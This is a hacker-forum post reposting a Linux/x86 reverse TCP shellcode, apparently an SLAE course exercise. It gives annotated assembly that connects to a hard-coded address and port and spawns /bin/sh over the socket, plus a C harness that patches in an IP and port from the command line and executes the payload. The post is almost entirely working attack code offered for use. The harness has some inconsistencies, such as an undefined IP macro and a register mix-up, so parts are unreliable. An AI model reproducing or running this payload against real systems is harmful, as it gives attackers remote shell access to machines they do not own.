• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Linux/x86反向TCP Shellcode(84个字节)


H4CK

Recommended Posts

# Title: Linux/x86 - Reverse TCP Shellcode ( 84 bytes )
# Author: Xenofon Vassilakopoulos 
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 84 bytes
# SLAE-ID: SLAE - 1314 
 
--------------------- Reverse Shellcode ---------------------
 
global _start 
section .text 
 
_start:  
 
xor eax, eax   ;zero out eax register  
mul edx        ;zero out edx register 
 
;;sockfd = socket(AF_INET,SOCK_STREAM,0); 
push edx     ; push 0 on the stack which is related with the third argument of the socket system call
mov ebx, edx ; zero out ebx  
inc ebx      ; define the SYS_SOCKET value to be 0x1.  
push ebx     ; SOCK_STREAM constant at type argument  
push 0x2     ; AF_INET constant at domain argument 
mov ecx, esp ; ECX will point to args at the top of the stack 
mov al, 0x66 ; call SocketCall() 
int 0x80     ; call system call interrupt to execute the arguments 
mov edi, eax ; EAX will store the return value of the socket descriptor to edi register 
 
;; sa.sin_family = AF_INET; 
;; sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR); 
;; sa.sin_port = htons(REMOTE_PORT);
;; connect(sockfd, (struct sockaddr *)&sa, sizeof(sa));
 
pop ebx          ; assign ebx with value (2) 
push 0x04c8a8c0  ; push IP 192.168.200.4 on the stack
push word 0xd204 ; push port 1234 on the stack   
push bx          ; push AF_INET constant into the 16 bytes register avoiding nulls 
mov ecx, esp     ; perform stack alignment - ecx points to struct
push 0x10        ; the size of the port  
push ecx         ; pointer to host_addr struct
push edi         ; save socket descriptor sockfd to struct
mov ecx, esp     ; perform stack alignment - ecx points at struct
inc ebx          ; use the connect system call (3) 
mov al, 0x66     ; call the socketcall system call 
int 0x80         ; call interrupt
 
;;dup2(sockfd, 2); 
;;dup2(sockfd, 1); 
;;dup2(sockfd, 0); 
    
mov ebx, esi  ; move sockfd descriptor to ebx 
xor ecx, ecx  ; zero out the ecx register before using it  
lo:
  mov al, 0x3f  ; the functional number that indicates dup2 (63 in dec)
  int 0x80      ; call dup2 syscall
  inc ecx       ; increase the value of ecx by 1 so it will take all values 0(stdin), 1(stdout), 2(stderr)
  cmp cl, 0x2   ; compare ecx with 2 which indicates the stderr descriptor
  jle lo        ; loop until counter is less or equal to 2
 
 
;; execve("/bin/sh", 0, 0);
xor eax, eax     ; zero out the eax register 
push eax         ; push NULL into the stack  
push 0x68732f2f  ; push "hs//" in reverse order into stack 
push 0x6e69622f  ; push "nib/" in reverse order into stack 
mov ebx, esp     ; point ebx into stack
push eax         ; push NULL into the stack 
mov edx, esp     ; point to edx into stack  
push ebx         ; push ebx into stack 
mov ecx, esp     ; point to ecx into stack 
mov al, 0xb      ; 0xb indicates the execve syscall 
int 0x80         ; execute execve syscall
 
 
--------------------- Shellcode ---------------------
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
 
#define PORT 27
#define REMOTE_ADDRESS 21
 
int main(int argc, char *argv[])
{
 
unsigned char shellcode[] = \
"\x31\xc0\xf7\xe2\x52\x89"
"\xd3\x43\x53\x6a\x02\x89"
"\xe1\xb0\x66\xcd\x80\x89"
"\xc7\x5b\x68"
"\xc0\xa8\xc8\x04"  // IP
"\x66\x68"
"\x04\xd2"   // PORT
"\x66\x53\x89\xe1\x6a\x10"
"\x51\x57\x89\xe1\x43\xb0"
"\x66\xcd\x80\x89\xfb\x31"
"\xc9\xb0\x3f\xcd\x80\x41"
"\x66\x83\xf9\x02\x7e\xf5"
"\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x89\xe2"
"\x53\x89\xe1\xb0\x0b\xcd"
"\x80";
 
// provide binary form of the IP into the shellcode in order to be able to connect to that specific IP address
unsigned ipaddress = inet_addr(argv[1]);
 
// copy the IP in the right shellcode offset 21 bytes from the beginning of the shellcode
memcpy(&shellcode[IP], &ipaddress, 4);
 
// provide binary form of the port into the shellcode in order to be able to connect to that specific port
unsigned int port = htons(atoi(argv[2]));
 
// copy the new port in the right shellcode offset 27 bytes from the beginning of the shellcode
memcpy(&shellcode[PORT], &port, 2);
 
printf("Shellcode Length: %d\n", strlen(shellcode));
 
int (*ret)() = (int(*)())shellcode;
 
ret();
 
}

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now